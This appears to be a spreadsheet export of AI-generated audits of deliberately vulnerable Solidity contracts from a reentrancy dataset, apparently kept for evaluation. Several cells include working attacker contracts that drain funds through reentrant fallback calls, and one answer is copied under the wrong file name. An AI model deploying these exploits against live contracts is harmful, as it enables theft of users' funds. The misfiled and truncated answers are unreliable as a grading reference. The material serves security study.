            bool callResult = msg.sender.call.value(oCredit)();
            require (callResult);
            credit[msg.sender] = 0;
        }
    }</t>
  </si>
  <si>
    <t>1. Yes, there is a vulnerability in this code.
2. Proof of concept of this vulnerability:
   The vulnerability lies in the ordering of operations in this function. In this case, the state of the contract (the `credit[msg.sender]` value) is updated only after attempting to send funds with `msg.sender.call.value(oCredit)()`. This is a re-entrancy vulnerability, as an attacker can create a fallback function in their contract that calls `withdrawAll()` again before the first `withdrawAll()` call has finished. This means the attacker can drain more funds than they have credit for.
   An attacker contract could look something like this:
   ```
   contract Attack {
     Target target;
     constructor(Target _target) {
         target = _target;
     }
     function attack() external {
         target.deposit.value(1 ether)();
         target.withdrawAll();
     }
     function () payable external {
         if (address(target).balance &gt;= 1 ether) {
             target.withdrawAll();
         }
     }
   }
   ```
   In this attacker contract, whenever the fallback function is executed, it checks if the target contract still has enough balance. If it does, it keeps calling `withdrawAll()`, draining the contract's balance.
3. The business impact of this vulnerability in one sentence: The `withdrawAll()` function leads to potential loss of all contract funds to an attacker.
4. The potential solutions of this vulnerability:
   There are multiple ways to mitigate this vulnerability:
   - **Pull over Push** for external calls: Instead of pushing the funds to the recipient, allow them to withdraw it themselves in a separate transaction. This makes it impossible for the recipient to perform any action until after the contract state has been updated.
   - **Use the Checks-Effects-Interactions pattern**: This pattern suggests you to first make all the checks (including the state changes), then make the effects (including the state changes), and finally interact with other contracts.
   - **Use a re-entrancy guard**: This is a modifier that prevents re-entrancy into a function. It can be implemented by using a state variable that tracks whether the contract is currently executing a function.
   Here's how the function would look like with the Checks-Effects-Interactions pattern:
   ```
   function withdrawAll() public {
       uint oCredit = credit[msg.sender];
       if (oCredit &gt; 0) {
           credit[msg.sender] = 0; // Checks and Effects
           balance -= oCredit;
           (bool success, ) = msg.sender.call{value: oCredit}(""); // Interactions
           require(success, "Transfer failed.");
       }
   }
   ```
   And here's how it would look with a re-entrancy guard:
   ```
   bool internal locked;
   modifier noReentrancy() {
       require(!locked, "Reentrant call.");
       locked = true;
       _;
       locked = false;
   }
   function withdrawAll() public noReentrancy {
       uint oCredit = credit[msg.sender];
       if (oCredit &gt; 0) {
           balance -= oCredit;
           (bool success, ) = msg.sender.call{value: oCredit}("");
           require(success, "Transfer failed.");
           credit[msg.sender] = 0;
       }
   }
   ```</t>
  </si>
  <si>
    <t>Alright, let me first read and analyze the provided Solidity contract to determine if there are any reentrancy vulnerabilities.
The provided Solidity contract `ReentrancyDAO` has the following structure:
1. It maintains a `credit` mapping that keeps track of the ether balance of each address.
2. It has a `balance` variable that stores the total balance of the contract.
3. It has a `withdrawAll()` function that allows users to withdraw their entire balance:
   - The function first checks if the user has any credit.
   - If the user has credit, it reduces the balance of the contract by the amount of credit.
   - It then sends the ether to the `msg.sender` using a low-level `.call.value()` function.
   - It then sets the user's credit to 0.
4. It also has a `deposit()` function that allows users to deposit ether:
   - The function updates the user's credit and the total balance of the contract.
Analysis:
1. **Are there any reentrancy vulnerabilities?** 
   - **Yes.** There is a reentrancy vulnerability in the `withdrawAll()` function.
2. **how this vulnerability can be exploited :**
   - The vulnerability arises from the fact that the contract updates the `credit` of the `msg.sender` after making the ether transfer using `.call.value()`. If the recipient of the ether (i.e., `msg.sender`) is a malicious contract, it can call the `withdrawAll()` function again before the `credit[msg.sender]` is set to 0. This can cause the contract to send more ether than it should. The malicious contract can then drain the `ReentrancyDAO` contract of all its ether.
This is a classic reentrancy attack, also known as the DAO attack, which was one of the most infamous attacks in the Ethereum community. The proper mitigation is to make state changes before performing external calls. In this case, `credit[msg.sender]` should be set to 0 before the ether transfer is made.</t>
  </si>
  <si>
    <t>1. Are there any reentrancy vulnerabilities? 
Answer: Yes.
2. how this vulnerability can be exploited :
The function `withdrawAll` is susceptible to a reentrancy attack. This is because it first updates the contract's `balance` variable, then sends the funds to the `msg.sender` using the `.call.value()` method, and finally sets the `credit[msg.sender]` to 0. The problem lies in the order of these operations.
During the execution of the `.call.value()` method, control is handed over to the called contract (which is controlled by `msg.sender`). If that contract has a fallback function that calls `withdrawAll` again, it would be able to withdraw funds multiple times before the `credit[msg.sender]` is set to 0. This is classic reentrancy.
A malicious attacker can exploit this by deploying a contract with a fallback function that calls `withdrawAll` repeatedly. This would allow the attacker to drain more funds than they are entitled to.
A possible malicious contract could look something like this:
```solidity
contract Attacker {
    VulnerableContract target;
    constructor(address _target) public {
        target = VulnerableContract(_target);
    }
    function startAttack() public payable {
        target.deposit.value(msg.value)(); // Assuming there's a deposit function to put funds into the vulnerable contract
        target.withdrawAll();
    }
    // Fallback function that is automatically called when the contract receives Ether
    function() external payable {
        if (address(target).balance &gt; 0) {
            target.withdrawAll();
        }
    }
}
```
To mitigate this, the contract should first set `credit[msg.sender]` to 0, then send the funds, and finally update the `balance` variable.</t>
  </si>
  <si>
    <t>dataset/reentrancy/reentrancy_insecure.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function withdrawBalance() public {
        uint amountToWithdraw = userBalances[msg.sender];
        (bool success, ) = msg.sender.call.value(amountToWithdraw)(""); // At this point, the caller's code is executed, and can call withdrawBalance again
        require(success);
        userBalances[msg.sender] = 0;
    }</t>
  </si>
  <si>
    <t>Alright, let's start by examining the content of the uploaded Solidity file.
The provided Solidity code defines a contract named `Reentrancy_insecure`. Here's a breakdown of its contents:
1. There's a private mapping named `userBalances` that associates Ethereum addresses with their respective balances.
2. The contract has a public function named `withdrawBalance` that allows users to withdraw their balance. The function works as follows:
   - It first determines the amount to withdraw for the calling address.
   - It then tries to transfer this amount to the caller.
   - After the transfer, it sets the user's balance to zero.
1. **Are there any vulnerabilities?**
   - Yes.
2. **how this vulnerability can be exploited :**
   - The code is vulnerable to a reentrancy attack. The vulnerability arises from the order in which the `withdrawBalance` function operates:
     1. The amount to withdraw is determined.
     2. The contract transfers the amount to the caller.
     3. Only after the transfer is completed, the user's balance is set to zero.
     The problem here is that the user's balance isn't updated until after the transfer is made. This allows a malicious contract (when called by the `msg.sender.call.value(amountToWithdraw)("")` line) to call the `withdrawBalance` function again before the original call finishes. As a result, the attacker can repeatedly withdraw more than their balance, draining the contract's funds.
     In essence, after the contract sends the funds to the calling contract, but before the balance is set to zero, the called contract can re-enter the `withdrawBalance` function and withdraw more funds than it should be able to. This attack can be repeated multiple times in a single transaction, potentially draining the entire contract's balance.
To prevent this attack, the contract should first set the user's balance to zero, and only then transfer the funds. This would ensure that even if a reentrancy occurs, the malicious contract wouldn't be able to withdraw more funds since the balance would already be zero.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
Answer: Yes.
2. how this vulnerability can be exploited :
The code contains a reentrancy vulnerability. The function `withdrawAll` is vulnerable to reentrancy attacks because it makes an external call to `msg.sender` (which can be a malicious contract) before it updates the state variable `credit[msg.sender]`.
Here's how an attacker can exploit this:
- The attacker deploys a malicious contract that has a fallback function. 
- The attacker makes sure their `credit[msg.sender]` in the vulnerable contract has a non-zero value.
- The attacker calls `withdrawAll` on the vulnerable contract. 
- When `msg.sender.call.value(oCredit)()` is executed, it triggers the fallback function in the attacker's contract.
- Inside the fallback function, the attacker calls `withdrawAll` again. Since `credit[msg.sender]` has not been set to 0 yet in the vulnerable contract, the attacker can withdraw their balance again.
- This can be repeated multiple times in a single transaction, draining the balance of the vulnerable contract.
Here's a simple malicious contract that can exploit this vulnerability:
```solidity
contract Attacker {
    VulnerableContract target;
    constructor(address _target) {
        target = VulnerableContract(_target);
    }
    function attack() public payable {
        target.deposit.value(msg.value)(); // Assuming there's a deposit function to put money in
        target.withdrawAll();
    }
    fallback() external payable {
        if (address(target).balance &gt; 1 ether) {  // Just an example threshold
            target.withdrawAll();
        }
    }
}
```
To fix this vulnerability, state changes should be made before making external calls. In the `withdrawAll` function, the line `credit[msg.sender] = 0;` should be moved before the `msg.sender.call.value(oCredit)();` line.</t>
  </si>
  <si>
    <t>I'll start by examining the provided Solidity code to check for any reentrancy vulnerabilities. After the analysis, I'll provide you with the structured feedback as you requested. Let's begin.
The provided Solidity code defines a contract named `Reentrancy_insecure`. Let's break down its key components:
1. There's a `mapping` named `userBalances` that keeps track of the balances of users.
2. There's a function named `withdrawBalance` that lets a user withdraw their balance.
Now, I'll analyze it for reentrancy vulnerabilities.
1. **Are there any reentrancy vulnerabilities?**
   - **Answer**: Yes
2. **how this vulnerability can be exploited **: 
   - In the `withdrawBalance` function, the contract sends ether to the caller's address using the `.call.value(amountToWithdraw)("")` method.
   - After the ether transfer, the contract sets the user's balance to 0 with `userBalances[msg.sender] = 0;`.
   - The problem here is the sequence. Before updating the user's balance in the contract, the contract sends the ether. This means that the caller's fallback function (or any function that is called as a result of the ether transfer) can call the `withdrawBalance` function again before the balance is set to 0. This can result in the user withdrawing more ether than they should be able to.
   - This is a classic reentrancy attack, also known as the recursive call vulnerability.
In summary, the `Reentrancy_insecure` contract is vulnerable to a reentrancy attack because it sends ether before updating the internal state (`userBalances`).</t>
  </si>
  <si>
    <t>dataset/reentrancy/reentrancy_simple.sol</t>
  </si>
  <si>
    <t xml:space="preserve">     function withdrawBalance(){
         if( ! (msg.sender.call.value(userBalance[msg.sender])() ) ){
             throw;
         }
         userBalance[msg.sender] = 0;
     }</t>
  </si>
  <si>
    <t>Alright, I will review the provided Solidity code file `reentrancy_simple.sol`. Let's start by displaying the contents of the file to understand its structure and functionality.
The code provided is a simple Solidity smart contract named `Reentrance`. Here's a quick overview:
1. It uses Solidity version ^0.4.15.
2. There's a mapping called `userBalance` that keeps track of the balance of each user (address).
3. The contract has three functions:
   - `getBalance(address u)` - Returns the balance of a user.
   - `addToBalance()` - Adds the sent ether (`msg.value`) to the caller's balance in the contract.
   - `withdrawBalance()` - Sends the caller's balance in ether back to them and then sets their balance in the contract to 0.
Now, let's address the vulnerabilities.
**1. Are there any vulnerabilities?**
Yes.
**2. how this vulnerability can be exploited :**
The `withdrawBalance()` function in the contract is vulnerable to a reentrancy attack. The vulnerability stems from the fact that the contract first sends the ether to the caller using the `call.value` method and then sets their balance to zero. A malicious contract could exploit this by implementing a fallback function that immediately calls `withdrawBalance()` again before the original call has finished. This would allow the attacker to withdraw more ether than they should be able to.
Here's a simple malicious contract that demonstrates this vulnerability:
```solidity
contract Attack {
    Reentrance target;
    function Attack(address _target) {
        target = Reentrance(_target);
    }
    function deposit() payable {
        target.addToBalance.value(msg.value)();
    }
    function attack() {
        target.withdrawBalance();
    }
    function() payable {
        if (address(target).balance &gt; 0) {
            target.withdrawBalance();
        }
    }
}
```
When the `attack()` function is called, the contract will call `withdrawBalance()` on the vulnerable contract. If the vulnerable contract sends ether to the malicious contract, the fallback function is triggered. The fallback function then immediately calls `withdrawBalance()` again. This can be repeated until the vulnerable contract's balance is drained.
In summary, the provided contract is vulnerable to a reentrancy attack due to the ordering of the operations in the `withdrawBalance()` function.</t>
  </si>
  <si>
    <t>1. Vulnerabilities: Yes
2. Proof of concept of this vulnerability: The vulnerability in this code is a reentrancy attack.
3. The business impact of this vulnerability in one sentence: The function leads to a reentrancy attack, where an attacker can repeatedly call this function to drain the contract's balance.
4. Potential solutions of this vulnerability:
   - Use the "send" or "transfer" functions instead of "call.value" to prevent reentrancy attacks.
   - Implement a state variable to track the withdrawal status of each user and restrict multiple withdrawals until the previous one is completed.
   - Consider adopting the "Checks-Effects-Interactions" pattern to ensure that state changes occur before any external calls are made.</t>
  </si>
  <si>
    <t>Alright, let's start by reading and understanding the content of the provided Solidity file. I'll then assess it for any reentrancy vulnerabilities.
The provided Solidity code defines a contract named `Reentrance`. Here's a breakdown of the contract:
1. It has a state variable `userBalance` which is a mapping from addresses to unsigned integers, representing the balance of each user.
2. The `getBalance` function allows users to check their balance.
3. The `addToBalance` function allows users to send ether to the contract, which is added to their balance.
4. The `withdrawBalance` function allows users to withdraw their balance. It uses the `.call.value()` method to send ether, followed by resetting the user's balance to zero.
Now, let's analyze it for reentrancy vulnerabilities:
1. **Are there any reentrancy vulnerabilities?** 
   - The `withdrawBalance` function uses the `msg.sender.call.value()` method to send ether, which allows the receiving contract to execute its fallback function. If the receiving contract's fallback function calls `withdrawBalance` again before `userBalance[msg.sender]` is set to zero, this can lead to a reentrancy attack. Therefore, the answer is **yes**.
2. **how this vulnerability can be exploited :** 
   - A malicious contract can be created with a fallback function that calls `withdrawBalance` of the `Reentrance` contract. When the malicious contract calls `withdrawBalance` for the first time, it will trigger its own fallback function, which calls `withdrawBalance` again. This can be done repeatedly to drain more ether than the malicious contract's balance in the `Reentrance` contract. 
Let's draft a simple malicious contract that demonstrates this vulnerability.
1. **Are there any reentrancy vulnerabilities?** 
   - Yes.
2. **how this vulnerability can be exploited :** 
```solidity
contract AttackReentrance {
    Reentrance target;
    address owner;
    function AttackReentrance(address _target) {
        target = Reentrance(_target);
        owner = msg.sender;
    }
    // Fund this contract
    function fund() payable {}
    // Initiate the attack
    function attack() {
        // Call the addToBalance function of the target to fund the attacker's balance
        target.addToBalance.value(address(this).balance)();
        // Start the attack by calling withdrawBalance
        target.withdrawBalance();
    }
    function() payable {
        // Reentrant call to withdrawBalance
        if (address(target).balance &gt; 0) {
            target.withdrawBalance();
        }
    }
    // Withdraw funds after the attack
    function withdraw() {
        owner.transfer(address(this).balance);
    }
}
```
In this malicious contract:
- We first fund the `AttackReentrance` contract using the `fund` function.
- The `attack` function is then called, which first funds the attacker's balance in the `Reentrance` contract using `addToBalance`, and then initiates the reentrancy attack by calling `withdrawBalance`.
- The fallback function of the `AttackReentrance` contract is designed to recursively call `withdrawBalance` as long as there's ether left in the `Reentrance` contract.
- After the attack, the attacker can withdraw the drained funds using the `withdraw` function.
Note: This is a simple example and in a real-world scenario, there might be other factors to consider. The best practice to avoid reentrancy attacks is to use the Checks-Effects-Interactions pattern and always update state variables before external calls.</t>
  </si>
  <si>
    <t>1. Yes.
2. how this vulnerability can be exploited :
The `withdrawBalance` function contains a reentrancy vulnerability due to the order of operations. The function sends Ether (`msg.sender.call.value(userBalance[msg.sender])()`) before updating the user's balance (`userBalance[msg.sender] = 0;`). This allows a malicious contract to recursively call `withdrawBalance` before the user's balance is set to zero, potentially draining the contract of its funds.
Here's a simple proof of concept:
```solidity
// Malicious contract that exploits the reentrancy vulnerability
contract Malicious {
    Victim victim;
    bool public drained = false;
    constructor(address _victim) {
        victim = Victim(_victim);
    }
    // This function will be called recursively by the victim contract
    function () external payable {
        if (!drained) {
            drained = true;
            victim.withdrawBalance();
        }
    }
    function attack() public {
        drained = false;
        victim.withdrawBalance();
    }
}
```
In the malicious contract above, when `attack` is called, it triggers the `withdrawBalance` function of the victim contract. During the Ether transfer process, the fallback function of the malicious contract is triggered, which again calls the `withdrawBalance` function of the victim contract. This recursive loop continues until the malicious contract sets the `drained` variable to `true`, or until the victim contract runs out of gas or funds. This allows the malicious contract to withdraw more than its entitled balance from the victim contract.</t>
  </si>
  <si>
    <t>dataset/reentrancy/simple_dao.sol</t>
  </si>
  <si>
    <t xml:space="preserve">  function withdraw(uint amount) {
    if (credit[msg.sender]&gt;= amount) {
      bool res = msg.sender.call.value(amount)();
      credit[msg.sender]-=amount;
    }
  }</t>
  </si>
  <si>
    <t>Alright, let's start by examining the content of the provided Solidity file "simple_dao.sol".
The provided Solidity code appears to define a contract named `SimpleDAO`. Here's a brief summary of the contract:
1. The contract maintains a `mapping` called `credit` which associates Ethereum addresses with their respective credit (in wei).
2. The `donate` function allows anyone to donate ether to another address, thereby increasing that address's credit.
3. The `withdraw` function allows an address to withdraw from its credit. It first checks if the address has enough credit, then sends the amount using the `.call.value()` method, and finally reduces the credit by the withdrawn amount.
4. The `queryCredit` function allows querying the credit of a given address.
Now, to answer your question:
### 1. Are there any vulnerabilities?
Yes.
### 2. how this vulnerability can be exploited :
The vulnerability present in the contract is the infamous reentrancy attack, also known as the DAO attack. The vulnerability arises from the way the `withdraw` function is implemented. Specifically, the contract sends funds with `msg.sender.call.value(amount)()` before deducting the amount from the sender's credit. An attacker can exploit this by setting up a fallback function in their contract that calls the `withdraw` function again before the original `withdraw` function has finished executing. This can drain the entire balance of the `SimpleDAO` contract.
Here's a simple example of how this can be exploited:
An attacker's contract might look like this:
```solidity
contract Attacker {
    SimpleDAO public dao;
    function Attacker(address daoAddress) {
        dao = SimpleDAO(daoAddress);
    }
    function attack() payable {
        dao.donate.value(msg.value)(address(this)); // Donate some ether to get credit
        dao.withdraw(msg.value); // Trigger the exploit
    }
    function() payable {
        dao.withdraw(msg.value); // Re-enter the withdraw function
    }
}
```
When the `attack` function is called, the `withdraw` function of the `SimpleDAO` contract will be triggered twice due to the reentrancy, even though the attacker only had credit for one withdrawal. This allows the attacker to drain more funds than they should be able to.</t>
  </si>
  <si>
    <t>1. Is there any vulnerabilities? 
Yes.
2. Explain in details how this vulnerability can be exploited:
The vulnerability in the provided code is known as a re-entrancy attack. The sequence of the function's operations is crucial here. The contract sends Ether (value) to `msg.sender` before it decreases the sender's credit. This allows the recipient to call the contract before the function finishes execution. If the recipient (or `msg.sender`) is a contract, it can call the `withdraw()` function again, because the `credit[msg.sender]` has not been reduced yet, creating a loop that could drain the contract's funds.
3. The business impact of this vulnerabilities in one sentence:
The `withdraw` function leads to potential loss of all contract funds due to recursive calls (re-entrancy attacks).
4. The potential solutions of this vulnerabilities:
The issue could be resolved by making sure that the state of the contract is updated before calling external contracts or sending Ether. This is known as the "Checks-Effects-Interactions" pattern in smart contract development. Here is the corrected code:
```solidity
  function withdraw(uint amount) {
    if (credit[msg.sender] &gt;= amount) {
      credit[msg.sender] -= amount;
      bool res = msg.sender.call.value(amount)();
    }
  }
```
In this version, the contract's state is updated (i.e., the `credit[msg.sender]` is reduced) before the Ether is sent. This ensures that if the recipient contract makes a call back to `withdraw()`, it won't be able to withdraw more than its credit.</t>
  </si>
  <si>
    <t>"Alright, let's start by reading and understanding the content of the provided Solidity file. I'll then assess it for any reentrancy vulnerabilities.
The provided Solidity code defines a contract named `Reentrance`. Here's a breakdown of the contract:
1. It has a state variable `userBalance` which is a mapping from addresses to unsigned integers, representing the balance of each user.
2. The `getBalance` function allows users to check their balance.
3. The `addToBalance` function allows users to send ether to the contract, which is added to their balance.
4. The `withdrawBalance` function allows users to withdraw their balance. It uses the `.call.value()` method to send ether, followed by resetting the user's balance to zero.
Now, let's analyze it for reentrancy vulnerabilities:
1. **Are there any reentrancy vulnerabilities?** 
   - The `withdrawBalance` function uses the `msg.sender.call.value()` method to send ether, which allows the receiving contract to execute its fallback function. If the receiving contract's fallback function calls `withdrawBalance` again before `userBalance[msg.sender]` is set to zero, this can lead to a reentrancy attack. Therefore, the answer is **yes**.
2. **how this vulnerability can be exploited :** 
   - A malicious contract can be created with a fallback function that calls `withdrawBalance` of the `Reentrance` contract. When the malicious contract calls `withdrawBalance` for the first time, it will trigger its own fallback function, which calls `withdrawBalance` again. This can be done repeatedly to drain more ether than the malicious contract's balance in the `Reentrance` contract. 
Let's draft a simple malicious contract that demonstrates this vulnerability.
1. **Are there any reentrancy vulnerabilities?** 
   - Yes.
2. **how this vulnerability can be exploited :** 
```solidity
contract AttackReentrance {
    Reentrance target;
    address owner;
    function AttackReentrance(address _target) {
        target = Reentrance(_target);
        owner = msg.sender;
    }
    // Fund this contract
    function fund() payable {}
    // Initiate the attack
    function attack() {
        // Call the addToBalance function of the target to fund the attacker's balance
        target.addToBalance.value(address(this).balance)();
        // Start the attack by calling withdrawBalance
        target.withdrawBalance();
    }
    function() payable {
        // Reentrant call to withdrawBalance
        if (address(target).balance &gt; 0) {
            target.withdrawBalance();
        }
    }
    // Withdraw funds after the attack
    function withdraw() {
        owner.transfer(address(this).balance);
    }
}
```
In this malicious contract:
- We first fund the `AttackReentrance` contract using the `fund` function.
- The `attack` function is then called, which first funds the attacker's balance in the `Reentrance` contract using `addToBalance`, and then initiates the reentrancy attack by calling `withdrawBalance`.
- The fallback function of the `AttackReentrance` contract is designed to recursively call `withdrawBalance` as long as there's ether left in the `Reentrance` contract.
- After the attack, the attacker can withdraw the drained funds using the `withdraw` function.
Note: This is a simple example and in a real-world scenario, there might be other factors to consider. The best practice to avoid reentrancy attacks is to use the Checks-Effects-Interactions pattern and always update state variables before external calls."</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities?
Answer: Yes.
2. how this vulnerability can be exploited :
The code contains a reentrancy vulnerability. The function `withdraw` allows a user to withdraw their funds, and it checks to see if the user has sufficient credit before proceeding. The vulnerability arises due to the order of operations. Specifically, the code sends funds to the `msg.sender` before updating the user's credit balance in the contract. This means that a malicious user can craft a fallback function in their own contract to call `withdraw` repeatedly before the original `withdraw` call has finished, draining more funds than they should be allowed.
Here's how it can be exploited:
A malicious user creates a contract with a fallback function that calls back into the `withdraw` function:
```solidity
contract MaliciousContract {
    VulnerableContract target;
    constructor(address _target) {
        target = VulnerableContract(_target);
    }
    function startAttack() external {
        target.deposit.value(someAmount)();
        target.withdraw(someAmount);
    }
    // Fallback function
    function() external payable {
        if (address(target).balance &gt; 0) {
            target.withdraw(someAmount);
        }
    }
}
```
When `startAttack` is called, it triggers the `withdraw` function of the vulnerable contract. During the withdrawal, when the `msg.sender.call.value(amount)();` line is executed, it sends the funds to the malicious contract, which in turn triggers the fallback function. The fallback function then calls the `withdraw` function again before the `credit[msg.sender]-=amount;` line is executed in the original call. This process can repeat multiple times, allowing the attacker to withdraw more funds than they should be allowed.</t>
  </si>
  <si>
    <t>dataset/reentrancy/spank_chain_payment.sol</t>
  </si>
  <si>
    <t xml:space="preserve">     function LCOpenTimeout(bytes32 _lcID) public {
         require(msg.sender == Channels[_lcID].partyAddresses[0] &amp;&amp; Channels[_lcID].isOpen == false);
         require(now &gt; Channels[_lcID].LCopenTimeout);
         if(Channels[_lcID].initialDeposit[0] != 0) {
             Channels[_lcID].partyAddresses[0].transfer(Channels[_lcID].ethBalances[0]);
         }
         if(Channels[_lcID].initialDeposit[1] != 0) {
             require(Channels[_lcID].token.transfer(Channels[_lcID].partyAddresses[0], Channels[_lcID].erc20Balances[0]),"CreateChannel: token transfer failure");
         }
         emit DidLCClose(_lcID, 0, Channels[_lcID].ethBalances[0], Channels[_lcID].erc20Balances[0], 0, 0);
        delete Channels[_lcID];
     }
</t>
  </si>
  <si>
    <t>Let me first review the provided Solidity code. Once I have analyzed it, I'll respond in the specified format.
The provided Solidity code begins with a definition for a `Token` contract. This contract appears to be an implementation of the ERC20 standard, or at least a variation of it. I will proceed to analyze the entire code for vulnerabilities.
Please give me a moment.
1. Are there any vulnerabilities? 
Answer: **Not sure**
If your answer is no, stop here; If your choice is yes or not sure:
2. how this vulnerability can be exploited : 
Without analyzing the full code, I can't provide a comprehensive assessment. However, based on the initial part of the code:
- It's using Solidity version 0.4.23, which is quite old. Newer versions of Solidity have resolved various vulnerabilities and improved the language's overall safety. Using an outdated version might expose the contract to known vulnerabilities that have been patched in later versions.
- The `Token` contract seems to be implementing a version of the ERC20 interface. A full review would be needed to ensure that it adheres to the standard and doesn't introduce unexpected behaviors.
- The absence of the `view` keyword in the `balanceOf` function suggests that the code might be from an older version of Solidity. Newer versions prefer using `view` over `constant`.
For a thorough assessment, I'd need to examine the entire code, including function implementations and other contracts (if any). Would you like me to continue with this analysis?</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
Answer: Yes.
2. how this vulnerability can be exploited :
a. **Reentrancy Attack**: The function `LCOpenTimeout` contains calls to external contracts, namely `Channels[_lcID].partyAddresses[0].transfer(...)` and `Channels[_lcID].token.transfer(...)`. If `Channels[_lcID].partyAddresses[0]` or `Channels[_lcID].token` are maliciously implemented contracts, they can take advantage of the `fallback` function to call `LCOpenTimeout` again before the current execution is completed. This can lead to unexpected behavior or even draining of funds.
b. **No Checks-Effects-Interactions Pattern**: The recommended order in smart contracts is to perform checks first (like requirements or conditions), then adjust the state, and finally interact with other contracts. In the given code, interactions with other contracts (using the `transfer` function) happen before the state of the current contract is adjusted (`delete Channels[_lcID]`). This can be exploited in combination with the reentrancy attack mentioned above.
c. **Potential Uninitialized Structs**: Depending on how the `Channels` mapping and its struct are defined elsewhere in the contract (which isn't provided in the snippet), there's a potential vulnerability if a user can pass a `_lcID` that hasn't been initialized. This might lead to unintended behavior, especially if there's no clear way to validate the integrity of `_lcID` values. 
d. **Gas Limit**: Transfers can fail due to gas stipends. The `transfer` method only provides a stipend of 2300 gas which may not be enough if the receiving contract does more complex operations in its fallback function. While it's generally safer to use `transfer` over `call.value()()`, it's important to be aware of potential issues with gas limits.
To avoid these vulnerabilities:
- For reentrancy, the contract can use a mutex or a reentrancy guard to prevent recursive calls.
- The contract should follow the checks-effects-interactions pattern rigorously.
- Ensure proper validation of `_lcID` and initialization of structs in the `Channels` mapping.
- Be cautious about gas limits when using `transfer` and consider other methods if necessary.</t>
  </si>
  <si>
    <t>Let's first review the contents of the provided Solidity file `spank_chain_payment.sol`. After that, I'll analyze it for any reentrancy vulnerabilities.
The provided code appears to be a Solidity smart contract. From the snippet I can see:
- It starts with a pragma statement indicating that it's written for Solidity version 0.4.23.
- A comment indicates that the file might have been flattened using the Solidity File Flattener.
- The `Token` contract is defined with several functions resembling the ERC20 standard (e.g., `balanceOf`, `transfer`, `transferFrom`, `approve`).
To determine if there are any reentrancy vulnerabilities, I need to further analyze the rest of the code, especially any functions that involve Ether transfers or call external contracts. Let's continue examining the rest of the code.
Continuing with the code analysis:
- There's an `allowance` function in the `Token` contract.
- The `Token` contract emits `Transfer` and `Approval` events.
- A library named `ECTools` is defined with functions related to Ethereum signatures.
Functions in `ECTools`:
1. `recoverSigner`: Recovers the address that has signed a message.
2. `isSignedBy`: Verifies if the message is signed by a given address.
3. `hexstrToBytes`: Converts a hex string to bytes.
These functions don't seem to involve Ether transfers or call external contracts directly, so they are not likely candidates for reentrancy vulnerabilities. However, we need to continue examining the rest of the code to make a conclusive determination.
Continuing with the `ECTools` library:
1. The `hexstrToBytes` function continues with its logic to convert a hex string to bytes.
2. `parseInt16Char`: Parses a hex character (e.g., 'a') and returns its decimal value (e.g., 10).
3. `uintToBytes32`: Converts a uint to a bytes32.
4. `toEthereumSignedMessage`: Hashes a signed message.
5. `uintToString`: Converts a uint to a string.
Again, these functions in the `ECTools` library do not involve Ether transfers or call external contracts directly, so they are not likely candidates for reentrancy vulnerabilities. We should continue examining the rest of the code to see if there are other sections that could potentially have reentrancy vulnerabilities.
Continuing with the analysis:
1. `substring`: Extracts a substring from a string.
2. The `StandardToken` contract is introduced, which appears to be an implementation of the `Token` interface defined earlier.
Functions in the `StandardToken` contract:
- `transfer`: Allows a sender to transfer tokens to another address.
- `transferFrom`: Allows a third party to transfer tokens from one address to another if they have an allowance.
The `transfer` and `transferFrom` functions modify the `balances` mapping to reflect the transfer of tokens between addresses. Importantly, these functions only deal with token balances and do not involve Ether transfers. Hence, they aren't directly susceptible to reentrancy attacks.
Let's continue examining the rest of the code to ensure there aren't any other sections that could have reentrancy vulnerabilities.
Continuing with the analysis:
- The `StandardToken` contract continues with more functions:
  - `balanceOf`: Returns the balance of a given address.
  - `approve`: Approves a third party (spender) to transfer up to a certain number of tokens from the message sender's account.
  - `allowance`: Returns the amount of tokens that a spender is still allowed to withdraw from an owner.
- The contract also has two mappings: `balances` (keeps track of token balances for each address) and `allowed` (keeps track of the allowances set by token holders).
- A new contract `HumanStandardToken` is introduced, which inherits from `StandardToken`. 
  - This contract includes public variables like `name`, `decimals`, `symbol`, and `version`.
  - The constructor sets the initial supply of tokens and assigns them to the contract creator.
Again, the functions we've reviewed so far only deal with token balances and don't involve Ether transfers, making them unlikely candidates for reentrancy attacks.
Let's continue examining the rest of the code.
Continuing with the analysis:
- The `HumanStandardToken` contract introduces a function named `approveAndCall`. This function is designed to allow tokens to be approved for transfer and then immediately call a function on another contract. The function:
  1. Sets an allowance for a `_spender`.
  2. Emits an `Approval` event.
  3. Makes an external call to the `_spender` using the `call` method with the `receiveApproval` signature. This is a potential place to check for reentrancy vulnerabilities because an external call is made.
- A new contract named `LedgerChannel` is introduced. A few details about this contract:
  1. It has public constants `NAME` and `VERSION`.
  2. Maintains a count of channels with `numChannels`.
  3. Emits events like `DidLCOpen`, `DidLCJoin`, `DidLCDeposit`, and `DidLCUpdateState`.
It's essential to carefully examine the `LedgerChannel` contract, especially its functions that involve external calls or Ether transfers, to determine if there are any reentrancy vulnerabilities.
Let's continue examining the rest of the code.
Continuing with the analysis of the `LedgerChannel` contract:
- Multiple events are emitted by this contract, including `DidLCClose`, `DidVCInit`, `DidVCSettle`, and `DidVCClose`.
- There's a `Channel` struct, which represents a ledger channel and its attributes.
- There's also a `VirtualChannel` struct, which represents a virtual channel.
The `Channel` struct has:
- Addresses for two parties.
- Balances and deposits for both Ether and an ERC20 token.
- Sequence numbers and timeouts for various channel operations.
- A flag indicating if the channel is open.
- A reference to the `HumanStandardToken` contract.
The `VirtualChannel` struct has:
- Flags indicating the channel's state.
- Sequence numbers and timeouts.
- A challenger address.
It appears that this contract is designed to manage ledger channels and nested virtual channels. Ledger channels are two-party state channels that can have funds deposited, updated, and closed. Virtual channels are channels nested within ledger channels, allowing participants to transact without opening new ledger channels.
However, the functions for these structures, which could be potential candidates for reentrancy vulnerabilities, haven't been shown yet. Let's continue examining the rest of the code to understand the behavior and interactions of these structures.
Continuing with the `LedgerChannel` contract:
- Two mappings are introduced:
  1. `virtualChannels` maps a bytes32 identifier to a `VirtualChannel` struct.
  2. `Channels` maps a bytes32 identifier to a `Channel` struct.
- There's a function named `createChannel`:
  - It allows the creation of a ledger channel. 
  - It has several checks:
    1. Ensure the channel hasn't been created before.
    2. Ensure the intermediary party's address (`_partyI`) is valid.
    3. Ensure provided balances are non-negative.
  - If Ether is provided, it updates the channel's Ether balance with the sent amount (`msg.value`).
